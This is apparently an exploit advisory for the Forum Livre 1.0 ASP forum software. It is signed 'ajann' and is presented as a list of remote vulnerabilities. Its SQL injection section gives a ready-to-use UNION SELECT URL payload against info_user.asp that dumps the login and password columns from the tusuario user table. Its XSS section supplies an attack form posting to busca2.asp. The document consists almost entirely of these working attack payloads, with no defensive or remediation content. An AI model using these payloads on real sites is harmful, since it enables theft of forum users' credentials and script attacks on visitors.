*******************************************************************************
# Title : Forum Livre 1.0 Multiple Remote Vulnerabilities
# Author : ajann
# Contact : :(
# $$ : Free*******************************************************************************
[[SQL]]]---------------------------------------------------------
Login Before..->
http://[target]/[path]//info_user.asp?user=[SQL]
Example:
//info_user.asp?user=-1'union%20select%200,0,0,loginu,senhau,0,0,0,0,0,0%20from%20tusuario
[[/SQL]]
[[XSS]]]---------------------------------------------------------
Login Before..->
http://[target]/[path]//busca2.asp (POST Method) [SQL]
Example:
<form method="POST" action="http://[TARGET]/[path]/busca2.asp">
<input type="text" name="palavra" value="[#]XSS HERE[#]">
<input type="radio" value="all" name="tipo" checked>
<input type="radio" value="some" name="tipo">
<select size="1" name="forum">
<option value="">Todos os f?runs</option>
<option value="">F?rum ComCatz</option>
<input type="submit" value="Investigar" name="B1">
</form>
[[/XSS]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!